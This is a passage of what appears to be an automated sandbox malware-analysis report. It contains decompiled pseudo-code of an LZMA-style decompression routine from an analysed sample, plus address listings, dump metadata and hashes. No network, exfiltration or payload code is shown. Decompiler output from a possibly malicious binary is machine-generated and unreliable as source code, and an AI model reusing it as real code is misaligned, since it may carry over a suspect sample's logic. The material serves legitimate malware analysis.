							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}










































                  0x00405ead
                  0x00405eb4
                  0x00405eba
                  0x00405ec0
                  0x00000000
                  0x00405ec4
                  0x00405ed0
                  0x00405ed0
                  0x00405ed0
                  0x00405ed9
                  0x00000000
                  0x00000000
                  0x00405edf
                  0x00000000
                  0x00405ee6
                  0x00405eea
                  0x00000000
                  0x00000000
                  0x00405ef3
                  0x00405ef6
                  0x00405ef9
                  0x00405efb
                  0x00405efd
                  0x00000000
                  0x00000000
                  0x00405f03
                  0x00405f06
                  0x00405f08
                  0x00405f09
                  0x00405f0c
                  0x00405f0e
                  0x00405f0f
                  0x00405f11
                  0x00405f14
                  0x00405f19
                  0x00405f1e
                  0x00405f27
                  0x00405f3a
                  0x00405f3d
                  0x00405f46
                  0x00405f49
                  0x00405f71
                  0x00405f71
                  0x00405f73
                  0x00405f81
                  0x00405f81
                  0x00405f85
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00405f75
                  0x00405f75
                  0x00405f78
                  0x00405f78
                  0x00405f79
                  0x00405f79
                  0x00000000
                  0x00405f75
                  0x00405f4b
                  0x00405f4f
                  0x00405f54
                  0x00405f54
                  0x00405f5d
                  0x00405f63
                  0x00405f65
                  0x00405f68
                  0x00000000
                  0x00405f6e
                  0x00405f6e
                  0x00000000
                  0x00405f6e
                  0x00000000
                  0x00405f8b
                  0x00405f8b
                  0x00405f8f
                  0x0040683b
                  0x00000000
                  0x0040683b
                  0x00405f98
                  0x00405fa8
                  0x00405fab
                  0x00405fae
                  0x00405fae
                  0x00405fae
                  0x00405fb1
                  0x00405fb1
                  0x00405fb5
                  0x00000000
                  0x00000000
                  0x00405fb7
                  0x00405fba
                  0x00405fbd
                  0x00405fe7
                  0x00405fed
                  0x00405ff4
                  0x00000000
                  0x00405ff4
                  0x00405fbf
                  0x00405fc3
                  0x00405fc6
                  0x00405fcb
                  0x00405fcb
                  0x00405fd6
                  0x00405fdc
                  0x00405fde
                  0x00405fe1
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00406026
                  0x0040602c
                  0x0040602f
                  0x0040603c
                  0x00406044
                  0x00000000
                  0x00000000
                  0x00405ffb
                  0x00405ffb
                  0x00405fff
                  0x0040684a
                  0x00000000
                  0x0040684a
                  0x0040600b
                  0x00406016
                  0x00406016
                  0x00406016
                  0x00406019
                  0x0040601c
                  0x0040601f
                  0x00406022
                  0x00406024
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004066bb
                  0x004066bb
                  0x004066c1
                  0x004066c7
                  0x004066ca
                  0x004066cd
                  0x004066e7
                  0x004066ea
                  0x004066f0
                  0x004066fb
                  0x004066fb
                  0x004066fd
                  0x004066cf
                  0x004066cf
                  0x004066de
                  0x004066e2
                  0x004066e2
                  0x00406700
                  0x00406707
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00406709
                  0x00406709
                  0x0040670d
                  0x004068bc
                  0x00000000
                  0x004068bc
                  0x00406719
                  0x00406720
                  0x00406728
                  0x00406728
                  0x00406728
                  0x0040672b
                  0x0040672e
                  0x0040672e
                  0x00000000
                  0x00000000
                  0x0040604c
                  0x0040604e
                  0x00406051
                  0x004060c2
                  0x004060c5
                  0x004060c8
                  0x004060cf
                  0x004060d9
                  0x00000000
                  0x004060d9
                  0x00406053
                  0x00406057
                  0x0040605a
                  0x0040605c
                  0x0040605f
                  0x00406062
                  0x00406064
                  0x00406067
                  0x00406069
                  0x0040606e
                  0x00406071
                  0x00406074
                  0x00406078
                  0x0040607f
                  0x00406082
                  0x00406089
                  0x0040608d
                  0x00406095
                  0x00406095
                  0x00406095
                  0x0040608f
                  0x0040608f
                  0x0040608f
                  0x00406084
                  0x00406084
                  0x00406084
                  0x00406099
                  0x0040609c
                  0x004060ba
                  0x004060bc
                  0x00000000
                  0x004060bc
                  0x0040609e
                  0x004060a1
                  0x004060a4
                  0x004060a7
                  0x004060a9
                  0x004060a9
                  0x004060a9
                  0x004060ac
                  0x004060af
                  0x004060b1
                  0x004060b2
                  0x004060b5
                  0x00000000
                  0x00000000
                  0x004062eb
                  0x004062ef
                  0x0040630d
                  0x00406310
                  0x00406317
                  0x0040631a
                  0x0040631d
                  0x00406320
                  0x00406323
                  0x00406326
                  0x00406328
                  0x0040632f
                  0x00406330
                  0x00406332
                  0x00406335
                  0x00406338
                  0x0040633b
                  0x0040633b
                  0x00406340
                  0x00000000
                  0x00406340
                  0x004062f1
                  0x004062f4
                  0x004062f7
                  0x00406301
                  0x00000000
                  0x00000000
                  0x00406355
                  0x00406359
                  0x0040637c
                  0x0040637f
                  0x00406382
                  0x0040638c
                  0x0040635b
                  0x0040635b
                  0x0040635e
                  0x00406361
                  0x00406364
                  0x00406371
                  0x00406374
                  0x00406374
                  0x00000000
                  0x00000000
                  0x00406398
                  0x0040639c
                  0x00000000
                  0x00000000
                  0x004063a2
                  0x004063a6
                  0x00000000
                  0x00000000
                  0x004063ac
                  0x004063ae
                  0x004063b2
                  0x004063b2
                  0x004063b5
                  0x004063b9
                  0x00000000
                  0x00000000
                  0x00406409
                  0x0040640d
                  0x00406414
                  0x00406417
                  0x0040641a
                  0x00406424
                  0x00000000
                  0x00406424
                  0x0040640f
                  0x00000000
                  0x00000000
                  0x00406430
                  0x00406434
                  0x0040643b
                  0x0040643e
                  0x00406441
                  0x00406436
                  0x00406436
                  0x00406436
                  0x00406444
                  0x00406447
                  0x0040644a
                  0x0040644a
                  0x0040644d
                  0x00406450
                  0x00406453
                  0x00406453
                  0x00406456
                  0x0040645d
                  0x00406462
                  0x00000000
                  0x00000000
                  0x004064f0
                  0x004064f0
                  0x004064f4
                  0x00406892
                  0x00000000
                  0x00406892
                  0x004064fa
                  0x004064fd
                  0x00406500
                  0x00406504
                  0x00406507
                  0x0040650d
                  0x0040650f
                  0x0040650f
                  0x0040650f
                  0x00406512
                  0x00406515
                  0x00000000
                  0x00000000
                  0x004060e5
                  0x004060e5
                  0x004060e9
                  0x00406856
                  0x00000000
                  0x00406856
                  0x004060ef
                  0x004060f2
                  0x004060f5
                  0x004060f9
                  0x004060fc
                  0x00406102
                  0x00406104
                  0x00406104
                  0x00406104
                  0x00406107
                  0x0040610a
                  0x0040610a
                  0x0040610d
                  0x00406110
                  0x00000000
                  0x00000000
                  0x00406116
                  0x0040611c
                  0x00000000
                  0x00000000
                  0x00406122
                  0x00406122
                  0x00406126
                  0x00406129
                  0x0040612c
                  0x0040612f
                  0x00406132
                  0x00406133
                  0x00406136
                  0x00406138
                  0x0040613e
                  0x00406141
                  0x00406144
                  0x00406147
                  0x0040614a
                  0x0040614d
                  0x00406150
                  0x0040616c
                  0x0040616f
                  0x00406172
                  0x00406175
                  0x0040617c
                  0x00406180
                  0x00406182
                  0x00406186
                  0x00406152
                  0x00406152
                  0x00406156
                  0x0040615e
                  0x00406163
                  0x00406165
                  0x00406167
                  0x00406167
                  0x00406189
                  0x00406190
                  0x00406193
                  0x00000000
                  0x00406199
                  0x00000000
                  0x00406199
                  0x00000000
                  0x0040619e
                  0x0040619e
                  0x004061a2
                  0x00406862
                  0x00000000
                  0x00406862
                  0x004061a8
                  0x004061ab
                  0x004061ae
                  0x004061b2
                  0x004061b5
                  0x004061bb
                  0x004061bd
                  0x004061bd
                  0x004061bd
                  0x004061c0
                  0x004061c3
                  0x004061c3
                  0x004061c3
                  0x004061c9
                  0x00000000
                  0x00000000
                  0x004061cb
                  0x004061ce
                  0x004061d1
                  0x004061d4
                  0x004061d7
                  0x004061da
                  0x004061dd
                  0x004061e0
                  0x004061e3
                  0x004061e6
                  0x004061e9
                  0x00406201
                  0x00406204
                  0x00406207
                  0x0040620a
                  0x0040620a
                  0x0040620d
                  0x00406211
                  0x00406213
                  0x004061eb
                  0x004061eb
                  0x004061f3
                  0x004061f8
                  0x004061fa
                  0x004061fc
                  0x004061fc
                  0x00406216
                  0x0040621d
                  0x00406220
                  0x00000000
                  0x00406222
                  0x00000000
                  0x00406222
                  0x00406220
                  0x00406227
                  0x00406227
                  0x00406227
                  0x00406227
                  0x00000000
                  0x00000000
                  0x00406262
                  0x00406262
                  0x00406266
                  0x0040686e
                  0x00000000
                  0x0040686e
                  0x0040626c
                  0x0040626f
                  0x00406272
                  0x00406276
                  0x00406279
                  0x0040627f
                  0x00406281
                  0x00406281
                  0x00406281
                  0x00406284
                  0x00406287
                  0x00406287
                  0x0040628d
                  0x0040622b
                  0x0040622b
                  0x0040622e
                  0x00000000
                  0x0040622e
                  0x0040628f
                  0x0040628f
                  0x00406292
                  0x00406295
                  0x00406298
                  0x0040629b
                  0x0040629e
                  0x004062a1
                  0x004062a4
                  0x004062a7
                  0x004062aa
                  0x004062ad
                  0x004062c5
                  0x004062c8
                  0x004062cb
                  0x004062ce
                  0x004062ce
                  0x004062d1
                  0x004062d5
                  0x004062d7
                  0x004062af
                  0x004062af
                  0x004062b7
                  0x004062bc
                  0x004062be
                  0x004062c0
                  0x004062c0
                  0x004062da
                  0x004062e1
                  0x004062e4
                  0x00000000
                  0x004062e6
                  0x00000000
                  0x004062e6
                  0x00000000
                  0x00406573
                  0x00406573
                  0x00406577
                  0x0040689e
                  0x00000000
                  0x0040689e
                  0x0040657d
                  0x00406580
                  0x00406583
                  0x00406587
                  0x0040658a
                  0x00406590
                  0x00406592
                  0x00406592
                  0x00406592
                  0x00406595
                  0x00000000
                  0x00000000
                  0x00406343
                  0x00406343
                  0x00406346
                  0x00000000
                  0x00000000
                  0x00406682
                  0x00406686
                  0x004066a8
                  0x004066ab
                  0x004066b5
                  0x004066b8
                  0x004066b8
                  0x00000000
                  0x004066b8
                  0x00406688
                  0x0040668b
                  0x0040668f
                  0x00406692
                  0x00406692
                  0x00406695
                  0x00000000
                  0x00000000
                  0x0040673f
                  0x00406743
                  0x00406761
                  0x00406761
                  0x00406761
                  0x00406768
                  0x0040676f
                  0x00406776
                  0x00406776
                  0x00000000
                  0x00406776
                  0x00406745
                  0x00406748
                  0x0040674b
                  0x0040674e
                  0x00406755
                  0x00406699
                  0x00406699
                  0x0040669c
                  0x00000000
                  0x00000000
                  0x00406830
                  0x00406833
                  0x00000000
                  0x00000000
                  0x0040646a
                  0x0040646c
                  0x00406473
                  0x00406474
                  0x00406476
                  0x00406479
                  0x00000000
                  0x00000000
                  0x00406481
                  0x00406484
                  0x00406487
                  0x00406489
                  0x0040648b
                  0x0040648b
                  0x0040648c
                  0x0040648f
                  0x00406496
                  0x00406499
                  0x004064a7
                  0x00000000
                  0x00000000
                  0x0040677d
                  0x0040677d
                  0x00406780
                  0x00406787
                  0x00000000
                  0x00000000
                  0x0040678c
                  0x0040678c
                  0x00406790
                  0x004068c8
                  0x00000000
                  0x004068c8
                  0x00406796
                  0x00406799
                  0x0040679c
                  0x004067a0
                  0x004067a3
                  0x004067a9
                  0x004067ab
                  0x004067ab
                  0x004067ab
                  0x004067ae
                  0x004067b1
                  0x004067b1
                  0x004067b1
                  0x004067b1
                  0x004067b4
                  0x004067b4
                  0x004067b8
                  0x00406818
                  0x0040681b
                  0x00406820
                  0x00406821
                  0x00406823
                  0x00406825
                  0x00406828
                  0x00406734
                  0x00406734
                  0x00000000
                  0x00406734
                  0x004067ba
                  0x004067c0
                  0x004067c3
                  0x004067c6
                  0x004067c9
                  0x004067cc
                  0x004067cf
                  0x004067d2
                  0x004067d5
                  0x004067d8
                  0x004067db
                  0x004067f4
                  0x004067f7
                  0x004067fa
                  0x004067fd
                  0x00406801
                  0x00406803
                  0x00406803
                  0x00406804
                  0x00406807
                  0x004067dd
                  0x004067dd
                  0x004067e5
                  0x004067ea
                  0x004067ec
                  0x004067ef
                  0x004067ef
                  0x0040680a
                  0x00406811
                  0x00000000
                  0x00406813
                  0x00000000
                  0x00406813
                  0x00000000
                  0x004064af
                  0x004064b2
                  0x004064e8
                  0x00406618
                  0x00406618
                  0x00406618
                  0x00406618
                  0x0040661b
                  0x0040661b
                  0x0040661e
                  0x00406620
                  0x004068aa
                  0x00000000
                  0x004068aa
                  0x00406626
                  0x00406629
                  0x00000000
                  0x00000000
                  0x0040662f
                  0x00406633
                  0x00406636
                  0x00406636
                  0x00406636
                  0x00000000
                  0x00406636
                  0x004064b4
                  0x004064b6
                  0x004064b8
                  0x004064ba
                  0x004064bd
                  0x004064be
                  0x004064c0
                  0x004064c2
                  0x004064c5
                  0x004064c8
                  0x004064de
                  0x004064e3
                  0x0040651b
                  0x0040651b
                  0x0040651f
                  0x0040654b
                  0x0040654d
                  0x00406554
                  0x00406557
                  0x0040655a
                  0x0040655a
                  0x0040655f
                  0x0040655f
                  0x00406561
                  0x00406564
                  0x0040656b
                  0x0040656e
                  0x0040659b
                  0x0040659b
                  0x0040659e
                  0x004065a1
                  0x00406615
                  0x00406615
                  0x00406615
                  0x00000000
                  0x00406615
                  0x004065a3
                  0x004065a9
                  0x004065ac
                  0x004065af
                  0x004065b2
                  0x004065b5
                  0x004065b8
                  0x004065bb
                  0x004065be
                  0x004065c1
                  0x004065c4
                  0x004065dd
                  0x004065df
                  0x004065e2
                  0x004065e3
                  0x004065e6
                  0x004065e8
                  0x004065eb
                  0x004065ed
                  0x004065ef
                  0x004065f2
                  0x004065f4
                  0x004065f7
                  0x004065fb
                  0x004065fd
                  0x004065fd
                  0x004065fe
                  0x00406601
                  0x00406604
                  0x004065c6
                  0x004065c6
                  0x004065ce
                  0x004065d3
                  0x004065d5
                  0x004065d8
                  0x004065d8
                  0x00406607
                  0x0040660e
                  0x00406598
                  0x00406598
                  0x00406598
                  0x00406598
                  0x00000000
                  0x00406610
                  0x00000000
                  0x00406610
                  0x0040660e
                  0x00406521
                  0x00406524
                  0x00406526
                  0x00406529
                  0x0040652c
                  0x0040652f
                  0x00406531
                  0x00406534
                  0x00406537
                  0x00406537
                  0x0040653a
                  0x0040653a
                  0x0040653d
                  0x00406544
                  0x00406518
                  0x00406518
                  0x00406518
                  0x00406518
                  0x00000000
                  0x00406546
                  0x00000000
                  0x00406546
                  0x00406544
                  0x004064ca
                  0x004064cd
                  0x004064cf
                  0x004064d2
                  0x00000000
                  0x00000000
                  0x00406231
                  0x00406231
                  0x00406235
                  0x0040687a
                  0x00000000
                  0x0040687a
                  0x0040623b
                  0x0040623e
                  0x00406241
                  0x00406244
                  0x00406247
                  0x0040624a
                  0x0040624d
                  0x0040624f
                  0x00406252
                  0x00406255
                  0x00406258
                  0x0040625a
                  0x0040625a
                  0x0040625a
                  0x00000000
                  0x00000000
                  0x004063bc
                  0x004063bc
                  0x004063c0
                  0x00406886
                  0x00000000
                  0x00406886
                  0x004063c6
                  0x004063c9
                  0x004063cc
                  0x004063cf
                  0x004063d1
                  0x004063d1
                  0x004063d1
                  0x004063d4
                  0x004063d7
                  0x004063da
                  0x004063dd
                  0x004063e0
                  0x004063e3
                  0x004063e4
                  0x004063e6
                  0x004063e6
                  0x004063e6
                  0x004063e9
                  0x004063ec
                  0x004063ef
                  0x004063f2
                  0x004063f2
                  0x004063f2
                  0x004063f5
                  0x004063f7
                  0x004063f7
                  0x00000000
                  0x00000000
                  0x00406639
                  0x00406639
                  0x00406639
                  0x0040663d
                  0x00000000
                  0x00000000
                  0x00406643
                  0x00406646
                  0x00406649
                  0x0040664c
                  0x0040664e
                  0x0040664e
                  0x0040664e
                  0x00406651
                  0x00406654
                  0x00406657
                  0x0040665a
                  0x0040665d
                  0x00406660
                  0x00406661
                  0x00406663
                  0x00406663
                  0x00406663
                  0x00406666
                  0x00406669
                  0x0040666c
                  0x0040666f
                  0x00406672
                  0x00406676
                  0x00406678
                  0x0040667b
                  0x00000000
                  0x0040667d
                  0x004063fa
                  0x004063fa
                  0x00000000
                  0x004063fa
                  0x0040667b
                  0x004068b0
                  0x004068d2
                  0x004068d8
                  0x004068da
                  0x004068e1
                  0x00000000
                  0x00000000
                  0x00405edf
                  0x004068e7
                  0x004068e7
                  0x00000000

                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a6e2085cebcdfb89d44d763a6c8341743f8cc52be166a66f13966f2f3d4d66a2
                  • Instruction ID: ba793bdfdeb6fca0581e378ecaac939fdd914989bdfd8c809e8e1c60c55c718d
                  • Opcode Fuzzy Hash: a6e2085cebcdfb89d44d763a6c8341743f8cc52be166a66f13966f2f3d4d66a2
                  • Instruction Fuzzy Hash: 90816972D04229DBDF24DFA8C844BAEBBB0FB44305F11816AD856B72C0C7785A86DF54
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004062EB Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                  Download Yara Rule
                  C-Code - Quality: 98%
                  			E004062EB() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M004068EF))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8));
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
